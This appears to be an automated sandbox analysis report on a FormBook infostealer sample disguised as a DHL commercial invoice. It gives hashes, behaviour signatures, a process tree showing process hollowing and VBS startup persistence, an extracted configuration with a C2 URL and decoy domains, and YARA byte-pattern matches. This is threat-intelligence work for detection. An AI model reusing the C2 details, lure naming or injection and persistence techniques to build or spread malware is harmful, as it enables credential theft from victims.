Edit tour

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Analysis ID:	1489834
MD5:	6bbfded2baa5a18cc97d10516ee91c78
SHA1:	9e39944c9d057d134b119c677be07975704e546e
SHA256:	636597dd8c59135be43119197ee60db2268abaa5d8a60f4c0ac296acd9dc444f
Tags:	DHLexeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Query firmware table information (likely to detect VMs)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe (PID: 3284 cmdline: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe" MD5: 6BBFDED2BAA5A18CC97D10516EE91C78)

name.exe (PID: 3700 cmdline: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe" MD5: 6BBFDED2BAA5A18CC97D10516EE91C78)

svchost.exe (PID: 2768 cmdline: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 4132 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)

cmd.exe (PID: 6764 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 6296 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

wscript.exe (PID: 7020 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

name.exe (PID: 2100 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6BBFDED2BAA5A18CC97D10516EE91C78)

svchost.exe (PID: 6680 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

mstsc.exe (PID: 4640 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)

WerFault.exe (PID: 6212 cmdline: C:\Windows\system32\WerFault.exe -u -p 4084 -s 7332 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
